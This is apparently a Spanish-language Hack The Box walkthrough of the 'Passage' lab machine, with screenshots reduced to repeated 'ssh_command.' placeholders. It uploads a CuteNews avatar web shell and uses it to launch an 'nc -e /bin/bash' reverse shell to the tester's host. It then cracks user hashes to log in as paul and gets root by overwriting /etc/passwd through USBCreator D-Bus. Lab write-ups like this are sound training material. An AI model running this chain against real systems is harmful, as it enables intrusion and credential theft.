Cu3rv0x
Passage

Passage


HTB Linux

nmap -A -p- -oA output 10.129.150.170 —min-rate=10000 —script=vuln —script-timeout=15 -v

nmap -sC -sV -O -p- -oA passage 10.129.150.170

nmap -sU -O -p- -oA passage-udp 10.129.150.170

nikto -h 10.129.150.170:80

ssh_command.

ssh_command.

whatweb http://10.129.150.170

ssh_command.

nmap —script http-enum -p80 10.129.150.170 -oN webScan -Pn

ssh_command.

http://10.129.150.170

ssh_command.

Vemos CuteNews

ssh_command.

http://10.129.150.170/CuteNews

ssh_command.

searchsploit CuteNews 2.1

ssh_command.

http://10.129.150.170/CuteNews/?register

ssh_command.

searchsploit -m 48800

ssh_command.

cat cmd.php

ghex cmd.php

ssh_command.

Le agregamos GIF8; al principio del archivo

file cmd.php

ssh_command.

http://10.129.150.170/CuteNews/index.php

Editamos nuestro perfil

Le damos click a “Browse” y subimos el archivo cmd.php

echo “10.129.150.170 passage.htb” | sudo tee -a /etc/hosts http://10.129.150.170/CuteNews/uploads/avatar_cu3rv0x_cmd.php?cmd=nc -e /bin/bash 10.10.14.45 443

ssh_command.

nc -lvnp 443

ssh_command.

shred -zun 10 -v avatar_cu3rv0x_cmd.php

ssh_command.

Despues iniciamos sesion

ssh_command.

https://github.com/CuteNews/cutenews-2.0

Vemos como esta estructurado CuteNews

cd /var/www/html/CuteNews/cdata/users

ssh_command.

Iniciamos un shell de python

hashlib.md5(“cu3rv0x”).hexadigest()

Vemos que los primeros dos digitos son 22.

Entonces hacemos un cat a 22.php que seria la informacion para cu3rv0x ya que CuteNews no usa bd.

ssh_command.

cat * | grep -v “denied” | base64-d; echo

ssh_command.

Creamos un archivo credentials.txt y ponemos las credenciales.

vim credentials.txt

cat credentials.txt | awk ‘{print $2}’ FS=”:”

cat credentials.txt | awk ‘{print $2}’ FS=”:” |xclip -sel xclip

ssh_command.

Vamos a crackstation y introducimos las credenciales

ssh_command.

credenciales -> paul:atlanta1

su paul

ssh_command.

cd ~/.ssh

cat authorized_keys

grep “sh$” /etc/passwd

ssh_command.

lsattr

ssh_command.

ssh nadav@localhost

ssh_command.

whoami

id

ls -al

ssh_command.

cat .viminfo

ssh_command.

https://unit42.paloaltonetworks.com/usbcreator-d-bus-privilege-escalation-in-ubuntu-desktop/

gdbus call —system —dest com.ubuntu.USBCreator —object-path /com/ubuntu/USBCreator —method com.ubuntu.USBCreator.Image /home/nadav/file.txt /file.txt true

ssh_command.

cp /etc/passwd .

openssl passwd

Creamos una contrase~a. Yo use “test”

ssh_command.

En passwd cambiamos la x por 9AyQs.WYSYTuE

Y guardamos el archivo

ssh_command.

gdbus call —system —dest com.ubuntu.USBCreator —object-path /com/ubuntu/USBCreator —method com.ubuntu.USBCreator.Image /home/nadav/passwd /etc/passwd true

ssh_command.

su root

Ponemos la contrasena que habiamos creado con el openssl

ssh_command.

© 2025 Cu3rv0x